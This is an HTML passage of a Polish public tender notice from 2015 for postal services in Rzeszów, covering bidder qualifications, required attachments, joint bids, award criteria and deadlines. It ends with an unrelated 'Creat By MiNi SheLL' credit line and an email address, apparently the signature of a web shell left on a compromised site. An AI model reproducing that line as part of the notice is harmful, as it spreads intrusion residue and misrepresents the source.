<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunku posiadania wiedzy i doświadczenia Wykonawca musi przedłożyć wykaz wykonanej, a w przypadku świadczeń ciągłych również wykonywanej, 1 usługi w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem jej wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługa została wykonana oraz załączeniem dowodów, czy została wykonana lub jest wykonywana należycie.

Uwaga: 
a)Za usługę potwierdzającą posiadanie przez Wykonawcę niezbędnej wiedzy i doświadczenia uważana będzie usługa polegająca na świadczeniu usług pocztowych o minimalnej wartości 100.000,00 zł (brutto).
Zamówienie to winno być poparte dowodem określającym, czy usługa została wykonana lub jest wykonywana należycie. 
b)W przypadku usługi rozliczanej w walutach innych niż Złoty Polski, Zamawiający dokona przeliczenia jej wartości wg średniego kursu wymiany walut ustalonego przez Narodowy Bank Polski na dzień podany, jako termin rozpoczęcia świadczenia wskazanych usług.
Kwalifikacja na podstawie zał. nr 5 i 6 do oferty.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku zostanie dokonana na podstawie oświadczenia Wykonawcy stanowiącego załącznik nr 1 do oferty.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku zostanie dokonana na podstawie oświadczenia Wykonawcy stanowiącego załącznik nr 1 do oferty.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku zostanie dokonana na podstawie oświadczenia Wykonawcy stanowiącego załącznik nr 1 do oferty.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>a)Za usługę potwierdzającą posiadanie przez Wykonawcę niezbędnej wiedzy i doświadczenia uważana będzie usługa polegająca na świadczeniu usług pocztowych o minimalnej wartości 100.000,00 zł (brutto).
Zamówienie to winno być poparte dowodem określającym, czy usługa została wykonana lub jest wykonywana należycie. 
b)W przypadku usługi rozliczanej w walutach innych niż Złoty Polski, Zamawiający dokona przeliczenia jej wartości wg średniego kursu wymiany walut ustalonego przez Narodowy Bank Polski na dzień podany, jako termin rozpoczęcia świadczenia wskazanych usług.;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Oferta winna być sporządzona na lub w oparciu o Wzór formularza oferty (załącznik Nr 1 do s.i.w.z.) oraz zawierać niżej wymienione załączniki:

Załącznik nr 1 - Oświadczenie o spełnianiu warunków udziału w postępowaniu przez Wykonawcę. 

Załącznik nr 2 - Oświadczenie o braku podstaw do wykluczenia Wykonawcy z postępowania na podstawie art. 24 ust. 1 i 2 ustawy - Prawo zamówień publicznych.

Załącznik nr 3 - a/ Aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji  o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1. pkt 2 ustawy - Prawo zamówień publicznych, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

b/ Jeżeli zasady reprezentacji nie wynikają jednoznacznie z przedłożonych zgodnie z ppkt a dokumentów wymaga się złożenia dokumentu wskazującego osobę uprawnioną lub upoważnioną do reprezentowania Wykonawcy.

Załącznik nr 4 -odpis z rejestru operatorów pocztowych,

Załącznik nr 5 -wykaz wykonanych, a w przypadku świadczeń ciągłych również wykonywanych, usług (o których mowa w pkt III.3.2 siwz) w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie. wg podanego wzoru Doświadczenie w zakresie wykonawstwa.

Załącznik nr 6 -Dowody określające, czy usługi, o których mowa w Załączniku nr 5 Doświadczenie w zakresie wykonawstwa zostały wykonane lub są wykonywane należycie.

UWAGA:
1)Dowodami jw, zgodnie z § 1 ust. 2 rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz. U. poz. 231), są: 
poświadczenia lub oświadczenie wykonawcy, jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia.


Dowody winny w swojej treści określać, czy usługi zostały wykonane lub są wykonywane należycie.
2)W przypadku, gdy zamawiający jest podmiotem, na rzecz którego usługi wskazane w załączniku nr 5 zostały wcześniej wykonane, wykonawca nie ma obowiązku przedkładania dowodów, o których mowa w ppkt1) 

Załącznik nr 7* - Pełnomocnictwo stosownie do postanowień zawartych w art. 23 ust. 2 ustawy Prawo Zamówień Publicznych.
Załącznik nr 8 -	Lista podmiotów należących do tej samej co Wykonawca grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5 ustawy - Prawo zamówień publicznych  - w przypadku przynależności Wykonawcy do grupy kapitałowej.

Załącznik nr 9 - Zakres rzeczowo-finansowy/ formularz cenowy

Załącznik nr 10*- Wykaz dokumentów zastrzeżonych, jako tajne. Objęte wykazem dokumenty stanowiące tajemnicę przedsiębiorstwa Wykonawca zamieści w oddzielnej kopercie.
Brak załącznika oznaczać będzie, że wszystkie złożone przez Wykonawcę dokumenty są jawne i mogą być udostępniane innym uczestnikom postępowania.

Załącznik nr 11*-  Pisemne zobowiązanie podmiotu trzeciego lub inny dokument potwierdzający oddanie do dyspozycji wykonawcy niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia- w przypadku korzystania przez wykonawcę z zasobów innych podmiotów ( art. 26 ust. 2 b).

*  jeżeli dotyczy

2.Nie ujawnia się informacji stanowiących tajemnicę przedsiębiorstwa w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji, jeżeli wykonawca nie później niż w terminie składania ofert, zastrzeże, ze nie mogą być one udostępniane oraz wykaże, iż zastrzeżone informacje stanowią tajemnicę przedsiębiorstwa. Wykonawca nie może zastrzec informacji, o których mowa w art. 86 ust. 4 ustawy.

3.Postanowienia w przypadku złożenia oferty przez Wykonawcę mającego siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej. 
1)Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej zamiast dokumentu, o którym mowa w pkt.  III.6. załącznik nr 3, składa dokument lub dokumenty wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że nie otwarto jego likwidacji ani nie ogłoszono upadłości, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
2)Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w ppkt 1 zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem. Dokument taki powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
3)W przypadku wątpliwości co do treści dokumentu złożonego przez wykonawcę mającego siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamawiający może zwrócić się do właściwych organów odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, z wnioskiem o udzielenie niezbędnych informacji dotyczących przedłożonego dokumentu.

4.Wymagania ogólne dotyczące sporządzenia oferty
1)Wykonawcy powinni przedstawić oferty zgodne z wymaganiami specyfikacji istotnych warunków zamówienia. Oferta winna zawierać wszystkie wymagane dokumenty, oświadczenia, załączniki i należy ją sporządzić na lub w oparciu o Formularz oferty. Wykonawców obowiązuje wykorzystanie załączonych wzorów załączników. Wszystkie pola i pozycje tych wzorów winny być wypełnione. W Tabelach zamieszczonych w Załączniku nr 9 do oferty Wykonawca wypełnia tylko białe pola.
2)Dokumenty, o których mowa w pkt  III.6 mogą być przedstawione w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem na każdej stronie, przez uprawnionych przedstawicieli Wykonawcy.
Oświadczenia Wykonawców (np. zał. Nr 1, 2) oraz pisemne zobowiązanie podmiotu do udostępnienia niezbędnych zasobów (zał. nr 11) winny być przedłożone w oryginale. Pełnomocnictwo do reprezentowania Wykonawców występujących wspólnie oraz ewentualne pełnomocnictwo dla osoby reprezentującej Wykonawcę winno być przedłożone w oryginale lub w formie kopii notarialnie poświadczonej.
3)Ofertę składa się w formie pisemnej.
4)Zamawiający nie wyraża zgody na złożenie ofert w postaci elektronicznej.
5)Oferta powinna być napisana w języku polskim, trwałą i czytelną techniką (np. na maszynie do pisania, komputerze, długopisem) w 1 egzemplarzu. Wszystkie dokumenty w języku obcym należy załączyć wraz z ich tłumaczeniem na język polski.
6)Oferta, załączniki, oświadczenia muszą być podpisane przez osobę (osoby) uprawnione do reprezentowania Wykonawcy. Jeżeli zasady reprezentacji nie wynikają z przedłożonych dokumentów wymaga się złożenie dokumentu wskazującego osobę uprawnioną lub upoważnioną do reprezentowania Wykonawcy.
7)Wszystkie miejsca, w których Wykonawca naniósł zmiany powinny być parafowane przez osobę podpisującą ofertę. Ewentualne zmiany powinny być naniesione czytelnie.
8)Wykonawcy ponoszą wszystkie koszty związane ze sporządzeniem i złożeniem oferty niezależnie od wyniku postępowania przetargowego.
9)Wykonawca może złożyć jedną ofertę.
10)Wykonawca winien zgromadzić wszelkie informacje, które mogą być konieczne do przygotowania oferty na własny koszt. 

5.Postanowienia w przypadku wniesienia oferty wspólnej przez dwóch lub więcej Wykonawców, o których mowa w art. 23 ustawy Prawo zamówień publicznych
1)Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.
W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania  ich w postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
2)Przedsiębiorcy prowadzący działalność w formie spółki cywilnej winni ustanowić pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego (art. 23 ust. 2 Ustawy Prawo Zamówień Publicznych), ewentualnie przedłożyć umowę spółki lub Uchwałę Wspólników, określające zakres uprawnień do reprezentowania spółki przez wspólników (art. 865 KC).
3)Postanowienia specyfikacji istotnych warunków zamówienia dotyczące wykonawców występujących wspólnie stosuje się odpowiednio do wspólników spółki cywilnej. 
4)Zgodnie z art. 141 ustawy Prawo zamówień publicznych Wykonawcy występujący wspólnie ponoszą solidarną odpowiedzialność za wykonanie umowy.
5)Dokumenty, oświadczenia, załączniki do oferty składane łącznie przez wykonawców wspólnie ubiegających się o udzielenie zamówienia powinny być podpisane przez ustanowionego pełnomocnika. Dokumenty, oświadczenia, załączniki do oferty składane oddzielnie przez każdego z Wykonawców wspólnie ubiegających się o udzielenie zamówienia, powinny być podpisane przez osobę (osoby) uprawnione do reprezentowania Wykonawcy, od którego pochodzą.
6)Kopie dokumentów i oświadczeń dotyczących każdego z wykonawców wspólnie ubiegających się o udzielenie zamówienia powinny być poświadczone za zgodność z oryginałem przez wykonawcę, którego dokument lub oświadczenie dotyczy.
7)Oferta winna być sporządzona wg następujących zasad:
a)formularz oferty i załączniki nr 1, 7, 9,10, 11 Wykonawcy występujący wspólnie składają jako jeden łączny, podpisany przez pełnomocnika, z zastrzeżeniem, że:
- pisemne zobowiązanie podmiotu do oddania do dyspozycji niezbędnych zasobów (zał. nr 11) winno być podpisane przez osobę (osoby) uprawnione do reprezentowania podmiotu udostępniającego zasoby,
- pełnomocnictwo, określone w art. 23 ust. 2 ustawy- Prawo zamówień publicznych (zał. nr 7) winno być podpisane przez osobę (osoby) uprawnione do reprezentowania każdego  z Wykonawców.
b)załączniki nr 2,3,4,8 winny pochodzić od każdego z podmiotów oddzielnie,
c)załącznik nr 5, 6.
Ponieważ oceniane będzie łączne doświadczenie wspólnie ubiegających się o udzielenie zamówienia Wykonawców nie jest wymagane złożenie w/w dokumentów przez wszystkich Wykonawców lecz dokumenty te mają obowiązek złożyć ten lub ci z Wykonawców, którzy w imieniu wszystkich wykażą spełnienie tego warunku łącznie.

6.Postanowienia w przypadku złożenia oferty przez Wykonawcę polegającego na zasobach innych podmiotów, o których mowa w art. 26 ust. 2b ustawy prawo zamówień publicznych.
1)Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków.
2)Powołując się na spełnianie warunku udziału w postępowaniu przez inny podmiot, Wykonawca jest zobowiązany udowodnić Zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie podmiotu do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia, stanowiące zał. Nr 11 do oferty.
3)Podmiot, który zobowiązał się do udostępnienia zasobów, odpowiada solidarnie z wykonawcą za szkodę zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów nie ponosi winy.
4)Treść zobowiązania podmiotu trzeciego powinna określać w szczególności, kto jest podmiotem przyjmującym zasoby, przedmiot oraz zakres zobowiązania podmiotu trzeciego, czego konkretnie dotyczy zobowiązanie, w jaki sposób będzie ono wykonane, a także jakiego okresu zobowiązanie dotyczy. 
5)Kopie dokumentów dotyczących podmiotu, na którego zasoby powołuje się wykonawca powinny być poświadczone za zgodność z oryginałem przez ten podmiot.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Dostępność nadawcza - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający, dla zapewnienia prawidłowej realizacji zamówienia, dopuszcza możliwość zmian postanowień zawartych w niniejszych ogólnych warunkach umowy, w tym w szczególności w następujących przypadkach:
a)Udzielenia Wykonawcy zamówień dodatkowych lub uzupełniających, od wykonania których uzależniona jest realizacja umowy, 
b)Ograniczenia zakresu rzeczowego umowy,
c)Zmiany przepisów prawnych dotyczących przedmiotu umowy, jeżeli zmiana przepisów wymaga zmiany postanowień umowy,
d)Sytuacji niezależnych od stron umowy, 
e)Zaistnienia zdarzeń objętych regulacją pkt 6 ppkt 4 niniejszych ogólnych warunków umowy.
2. Zmiany umowy, mogą być wprowadzone, z zastrzeżeniem  ppkt 2a, w następującym trybie:
a)Wykonawca zwróci się do Zamawiającego z wnioskiem o dokonanie zmiany umowy, zawierającym stosowne uzasadnienie. Wniosek winien być złożony w formie pisemnej przed wprowadzeniem zmian, niezwłocznie po ich wystąpieniu. Zamawiający po zapoznaniu się z uzasadnieniem i przy uwzględnieniu okoliczności sprawy dokona oceny zasadności zmiany umowy. Wykonawca zostanie poinformowany niezwłocznie o ich zaistnieniu i konieczności zmiany umowy.
b)Wszelkie zmiany umowy mogą być dokonywane na podstawie obustronnie uzgodnionych aneksów do Umowy.
2a. Zmiany, o których mowa w ppkt 1 lit. c)  i e) dokonywane będą z dniem wejścia w życie zmian aktów prawnych, z zastrzeżeniem, że Zamawiającemu przysługiwać będzie wypowiedzenie umowy na piśmie ze skutkiem na koniec okresu rozliczeniowego.


/pkt 6 ust.4 
Ryczałtowe ceny jednostkowe określone w Załączniku nr 2 do umowy obejmują wszystkie koszty związane z wykonaniem przedmiotu umowy i są niezmienne z zastrzeżeniem: 
- w przypadku  zmiany stawki  podatku VAT na  usługi pocztowe  nastąpi zmiana cen jednostkowych odpowiednio do stawki podatku,
- w przypadku , jeśli konieczność wprowadzenia zmian umowy wynika z uregulowań prawnych,
- ceny określone  przez Wykonawcę w Załączniku nr 2 do umowy ulegną  obniżeniu  w toku realizacji zamówienia w przypadku , gdy opłaty pocztowe wynikające ze standardowego  cennika  lub regulaminu  Wykonawcy będą  niższe od cen wynikających  z przedłożonej  oferty. 
Wykonawca  ma obowiązek stosowania  względem  Zamawiającego  obniżonych opłat pocztowych wynikających ze swojego aktualnego cennika lub regulaminu począwszy od dnia wprowadzenia zmiany. W zakresie, w którym ceny przedstawione w ofercie są korzystniejsze dla Zamawiającego stosuje się te ceny.
- Zamawiającemu  przysługuje  możliwość  korzystania z programów rabatowych (opustowych ) oferowanych  przez Wykonawcę  w toku  realizowanej umowy. /</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pzmiuw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> PZMiUW Rzeszów, ul. Hetmańska 9 - pok. 16 - odbiór osobisty lub przesłanie pocztą - za odpłatnością 0,15 zł za stronę formatu A-4.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.11.2015 godzina 08:30, miejsce: budynek PZMiUW Rzeszów, ul. Hetmańska 9 - pok. nr 222 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1)Miejsce i termin otwarcia ofert: PZMiUW Rzeszów, ul. Hetmańska 9 - sala konferencyjna (II p.), w dniu 18.11.2015 r. o godz. 09:00
2)Osoby uprawnione do porozumiewania się z wykonawcami: 
P. Kazimierz Czuma - PZMiUW Rzeszów, ul. Hetmańska 9, tel. (017) 853 74 55
3)Zamówienie nie jest finansowane ze środków Unii Europejskiej.
4)Termin wykonania zamówienia: 
Rozpoczęcie - z dniem zawarcia umowy
Zakończenie - 31.12.2018.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com